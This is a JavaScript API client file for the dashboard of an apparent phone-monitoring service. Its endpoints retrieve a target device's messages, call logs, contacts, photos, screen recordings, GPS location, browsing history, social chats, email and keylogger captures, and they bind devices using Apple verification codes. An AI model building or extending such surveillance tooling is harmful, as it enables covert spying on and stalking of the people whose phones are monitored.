import service from "@/tools/request";
// 登录
export function login(data) {
  return service({
    url: "api/user/login",
    method: "get",
    params: data,
  });
}
// 发送邮箱验证码
export function apiEmssend(data) {
  return service({
    url: "api/Ems/send",
    method: "post",
    data: data,
  });
}
// 发送注册邮件
export function userRegister(data) {
  return service({
    url: "api/user/register",
    method: "post",
    params: data,
  });
}
// 凭验证码修改手机号
export function apiUserResetpwd(data) {
  return service({
    url: "api/user/resetpwd",
    method: "post",
    data: data,
  });
}
// 获取设备列表
export function getEquipmentList(data) {
  return service({
    url: "/api/Equipment/get_equipment_list",
    method: "post",
    params: data,
  });
}
// 获取设备列表
export function indexAccountInfo(data) {
  return service({
    url: "api/index/accountInfo",
    method: "post",
    params: data,
  });
}
// 获取短信列表
export function Message(data) {
  return service({
    url: "api/Message/get_message_list",
    method: "post",
    params: data,
  });
}
export function IMessage(data) {
  return service({
    url: "api/Imessage/get_message_list",
    method: "post",
    params: data,
  });
}
// 获取通话记录列表
export function Mobile(data) {
  return service({
    url: "api/Mobile/get_mobile_log",
    method: "post",
    params: data,
  });
}
// 获取联系人列表
export function Concat(data) {
  return service({
    url: "api/Concat/get_concat_list",
    method: "post",
    params: data,
  });
}
// 获取活动列表
export function Event(data) {
  return service({
    url: "api/Event/get_event_list",
    method: "post",
    params: data,
  });
}
// 获取笔记列表
export function Notes(data) {
  return service({
    url: "api/Notes/get_notes",
    method: "post",
    params: data,
  });
}
// 获取图片列表
export function Photo(data) {
  return service({
    url: "api/Photo/get_photo",
    method: "post",
    params: data,
  });
}
export function getRecording(data) {
  return service({
    url: "api/Screenrecord/get_screenrecord",
    method: "post",
    params: data,
  });
}
// 获取视频列表
export function Video(data) {
  return service({
    url: "api/Video/get_video",
    method: "post",
    params: data,
  });
}
// 获取WIFI列表
export function Wifi(data) {
  return service({
    url: "api/Wifi/get_wifi",
    method: "post",
    params: data,
  });
}
// 获取键盘列表
export function KeyLogger(data) {
  return service({
    url: "api/KeyLogger/get_keylogger",
    method: "post",
    params: data,
  });
}
// 获取应用列表
export function App(data) {
  return service({
    url: "api/App/get_app",
    method: "post",
    params: data,
  });
}
export function AllApp(data) {
  return service({
    url: "api/App/get_all_app",
    method: "post",
    params: {
      ...data,
      limit: 99999999,
    },
  });
}

// 获取Gps列表
export function Gps(data) {
  return service({
    url: "api/Gps/get_gps",
    method: "post",
    params: data,
  });
}
// 获书签列表
export function Browserbookmark(data) {
  return service({
    url: "api/Browserbookmark/get_bookmark",
    method: "post",
    params: data,
  });
}
// 获浏览记录列表
export function Browserhistory(data) {
  return service({
    url: "api/Browserhistory/get_history",
    method: "post",
    params: data,
  });
}
// 获浏览记录列表
export function SocailMsg(data) {
  return service({
    url: "api/SocailMsg/get_chat",
    method: "post",
    params: data,
  });
}
export function Socailmsg(data) {
  return service({
    url: "api/Socailmsg/getContacts",
    method: "post",
    params: data,
  });
}

// 获浏会员权限
export function Ability(data) {
  return service({
    // url: 'api/Ability/get_package_list',
    url: "api/Ability/get_package_list_pc",
    method: "post",
    params: data,
  });
}
// 获浏会员权限
export function Messagedd(data) {
  return service({
    url: "api/Message/get_msg_content",
    method: "post",
    params: data,
  });
}
export function IMessagedd(data) {
  return service({
    url: "api/Imessage/get_msg_content",
    method: "post",
    params: data,
  });
}
// 获浏使用条款权限
export function getTermsofuse(data) {
  return service({
    url: "api/index/get_termsofuse",
    method: "post",
    params: data,
  });
}
// 获浏隐私政策
export function getPrivagypolicy(data) {
  return service({
    url: "api/index/get_privagypolicy",
    method: "post",
    params: data,
  });
}
// 获浏最后登录地址权限
export function lastgps(data) {
  return service({
    url: "api/index/lastgps",
    method: "post",
    params: data,
  });
}
// 获浏首页环状图
export function mostmsg(data) {
  return service({
    url: "api/index/mostmsg",
    method: "post",
    params: data,
  });
}
// 获浏首页柱状图
export function getTargetActivity(data) {
  return service({
    url: "api/index/getTargetActivityPc",
    method: "post",
    params: data,
  });
}
// 获浏首页柱状图
export function SocailMsgGetChatDetail(data) {
  return service({
    url: "api/SocailMsg/get_chatDetail",
    method: "post",
    params: data,
  });
}
// 获取首页硬件信息
export function accountInfo(data) {
  return service({
    url: "api/index/accountInfo",
    method: "post",
    params: data,
  });
}

// 获取所有的 阻止的网址
export function BlockcontrolGetWebsite(data) {
  return service({
    url: "api/Blockcontrol/get_website",
    method: "post",
    params: data,
  });
}
// 阻止网址 新增
export function BlockcontrolInsertSite(data) {
  return service({
    url: "api/Blockcontrol/insert_site",
    method: "post",
    params: data,
  });
}
// 阻止网址 删除
export function BlockcontrolDelete(data) {
  return service({
    url: "api/Blockcontrol/delete",
    method: "post",
    params: data,
  });
}
// 阻止WIFI 删除
export function WifiAddBlock(data) {
  return service({
    url: "api/Wifi/addBlock",
    method: "post",
    params: data,
  });
}
// 不重复WIFI
export function getWifiNotSame(data) {
  return service({
    url: "api/Wifi/getWifiNotSame",
    method: "post",
    params: data,
  });
}
// 阻止app
export function AppAddBlock(data) {
  return service({
    url: "api/App/addBlock",
    method: "post",
    params: data,
  });
}
// 获取所有的围栏定位
export function geogpsGetGps(data) {
  return service({
    url: "api/geogps/get_gps",
    method: "post",
    params: data,
  });
}
// 插入 围栏坐标
export function GeogpsInsertGps(data) {
  return service({
    url: "api/Geogps/insert_gps",
    method: "post",
    params: data,
  });
}
// 删除围栏
export function geogpsDelete(data) {
  return service({
    url: "api/geogps/delete",
    method: "post",
    params: data,
  });
}
// 编辑围栏
export function geogpsEdit(data) {
  return service({
    url: "api/geogps/edit",
    method: "post",
    params: data,
  });
}
// 添加关键字
export function KeytrackingInsertKeytracking(data) {
  return service({
    url: "api/Keytracking/insert_keytracking",
    method: "post",
    params: data,
  });
}
// 编辑围栏
export function KeytrackingGetKeywords(data) {
  return service({
    url: "api/Keytracking/get_keywords",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function KeytrackingGetDetected(data) {
  return service({
    url: "api/Keytracking/getDetected",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function KeytrackingGetRules(data) {
  return service({
    url: "api/Keytracking/get_rules",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function KeytrackingGetNotify(data) {
  return service({
    url: "api/Keytracking/get_notify",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function BindDeviceGetDeviceList(data) {
  return service({
    url: "api/BindDevice/getDeviceList",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function BindDeviceGetSystemList(data) {
  return service({
    url: "api/BindDevice/getSystemList",
    method: "post",
    params: data,
  });
}
// keytrack 获取检测到的关键词
export function binddeviceGetStepDes(data) {
  return service({
    url: "api/binddevice/getStepDes",
    method: "post",
    params: data,
  });
}
// 设备绑定结束后，执行
export function BinddeviceBindDevice(data) {
  return service({
    url: "api/Binddevice/bindDevice",
    method: "post",
    params: data,
  });
}
// 上传appid
export function BinddeviceBindApple(data) {
  return service({
    url: "api/Binddevice/bindApple",
    method: "post",
    params: data,
  });
}
// 获取ios 步骤
export function binddeviceGetIosStepDes(data) {
  return service({
    url: "api/binddevice/getIosStepDes",
    method: "post",
    params: data,
  });
}
// 获取ios 步骤
export function binddeviceAppleVerficationCode(data) {
  return service({
    url: "api/binddevice/appleVerficationCode",
    method: "post",
    params: data,
  });
}
// 获取设备
export function appleVerficationCodeNew(data) {
  return service({
    url: "api/binddevice/appleVerficationCodeNew",
    method: "post",
    params: data,
  });
}

// 获取设备 V2
export function appleVerficationCodeNewV2(data) {
  return service({
    url: "api/binddevice/appleVerficationCodeNewV2",
    method: "post",
    params: data,
  });
}

// 更新设备
export function updateIosDeviceName(data) {
  return service({
    url: "api/Binddevice/updateIosDeviceName",
    method: "post",
    params: data,
  });
}
export function resendCode(data) {
  return service({
    url: "api/Binddevice/resendCode",
    method: "post",
    params: data,
  });
}
// 获取ios 步骤
export function changeemail(data) {
  return service({
    url: "api/user/changeemail",
    method: "post",
    params: data,
  });
}
// 通话记录--社交聊天三方软件
export function SocailmsgGetCallLog(data) {
  return service({
    url: "api/Socailmsg/getCallLog",
    method: "post",
    params: data,
  });
}
// 邮箱列表
export function getEmailList(data) {
  return service({
    url: "api/Email/getEmailList",
    method: "post",
    params: data,
  });
}
export function getEmailReceiver(data) {
  return service({
    url: "api/Email/getEmailReceiver",
    method: "post",
    params: data,
  });
}

// 创建会员购买订单
export function createVipOrder(data) {
  return service({
    url: "api/vip/createVipOrder",
    method: "post",
    params: data,
  });
}
// 创建订单接口
export function createOrder(data) {
  return service({
    url: "api/Vip/createOrder",
    method: "post",
    params: data,
  });
}
// 设备解绑
export function EquipmentUnbindDevice(data) {
  return service({
    url: "api/Equipment/unbindDevice",
    method: "post",
    params: data,
  });
}
// 修改自动续费
export function vipChangeAuto(data) {
  return service({
    url: "api/vip/changeAuto",
    method: "post",
    params: data,
  });
}
// 取消自动续费原因
export function RenewalAdd(data) {
  return service({
    url: "api/Renewal/add",
    method: "post",
    params: data,
  });
}
// 取消自动续费原因
export function getPackage(data) {
  return service({
    url: "api/Ability/getPackage",
    method: "post",
    params: data,
  });
}
// 修改密码
export function userChangepwd(data) {
  return service({
    url: "api/user/changepwd",
    method: "post",
    params: data,
  });
}
// 修改密码
export function userChangeemail(data) {
  return service({
    url: "api/user/changeemail",
    method: "post",
    params: data,
  });
}

// 修改密码
export function updateGpsConfig(data) {
  return service({
    url: "api/user/updateGpsConfig",
    method: "post",
    params: data,
  });
}
// 以下为模板文件
export function dataGetGoods(data) {
  return service({
    url: "data/getGoods",
    method: "GET",
    params: data,
  });
}
export function wayInfoList(data) {
  return service({
    url: "admin/wayInfoList",
    method: "post",
    data: data,
  });
}
export function EmsCheck(data) {
  return service({
    url: "Ems/check",
    method: "post",
    data: data,
  });
}

export function getEquipmentDetail(data) {
  return service({
    url: "api/equipment/getEquipmentDetail",
    method: "post",
    data: data,
  });
}

export function getTimeZone(data) {
  return service({
    url: "api/user/getTimeZone",
    method: "post",
    data: data,
  });
}

export function setTimeZone(data) {
  console.log(data);
  return service({
    url: "api/user/setTimeZone",
    method: "post",
    data: data,
  });
}

export function getCurrentTimeZone(data) {
  return service({
    url: "api/user/getCurrentTimeZone",
    method: "post",
    data: data,
  });
}

export function setTimeZoneDefault(data) {
  return service({
    url: "api/user/setTimeZoneDefault",
    method: "post",
    data: data,
  });
}
// 删除关键词
export function delettrackkey(data) {
  return service({
    url: "api/Keytracking/delettrackkey",
    method: "post",
    data: data,
  });
}

// 修改设备名称
export function updateEquipmentName(data) {
  return service({
    url: "api/Equipment/updateEquipmentName",
    method: "post",
    data: data,
  });
}
// 获取地图Key
export function getMapKeys(data) {
  return service({
    baseURL: "https://api.spylix.com/",
    url: "api/Index/getMapKeys",
    method: "post",
    data: data,
  });
}

export function updateApiIntervalConfig(data) {
  return service({
    url: "api/user/updateApiIntervalConfig",
    method: "post",
    data: data,
  });
}

export function getApiIntervalConfig() {
  return service({
    url: "api/user/getApiIntervalConfig",
    method: "post",
  });
}



// WEBPACK FOOTER //
// ./src/api/user.js